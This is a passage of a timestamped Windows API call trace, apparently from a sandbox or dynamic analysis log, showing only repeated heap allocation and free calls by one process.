hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.168] GetProcessHeap () returned 0x280000 [0059.168] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.169] GetProcessHeap () returned 0x280000 [0059.169] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.170] GetProcessHeap () returned 0x280000 [0059.170] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.170] GetProcessHeap () returned 0x280000 [0059.170] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.170] GetProcessHeap () returned 0x280000 [0059.170] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.170] GetProcessHeap () returned 0x280000 [0059.170] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.170] GetProcessHeap () returned 0x280000 [0059.170] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.170] GetProcessHeap () returned 0x280000 [0059.170] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.170] GetProcessHeap () returned 0x280000 [0059.170] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.170] GetProcessHeap () returned 0x280000 [0059.170] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.170] GetProcessHeap () returned 0x280000 [0059.170] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.170] GetProcessHeap () returned 0x280000 [0059.170] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.170] GetProcessHeap () returned 0x280000 [0059.170] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.170] GetProcessHeap () returned 0x280000 [0059.170] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.170] GetProcessHeap () returned 0x280000 [0059.170] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.188] GetProcessHeap () returned 0x280000 [0059.193] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.233] GetProcessHeap () returned 0x280000 [0059.245] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.246] GetProcessHeap () returned 0x280000 [0059.246] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.247] GetProcessHeap () returned 0x280000 [0059.247] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.248] GetProcessHeap () returned 0x280000 [0059.248] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.249] GetProcessHeap () returned 0x280000 [0059.249] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.250] GetProcessHeap () returned 0x280000 [0059.250] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.250] GetProcessHeap () returned 0x280000 [0059.251] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.251] GetProcessHeap () returned 0x280000 [0059.251] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.251] GetProcessHeap () returned 0x280000 [0059.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d51f48 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d51f48 | out: hHeap=0x280000) returned 1 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x104) returned 0x2f1ca8 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.252] GetProcessHeap () returned 0x280000 [0059.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d52050 [0059.252] GetProcessHeap () returned 0x280000 [0059.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1ca8 | out: hHeap=0x280000) returned 1 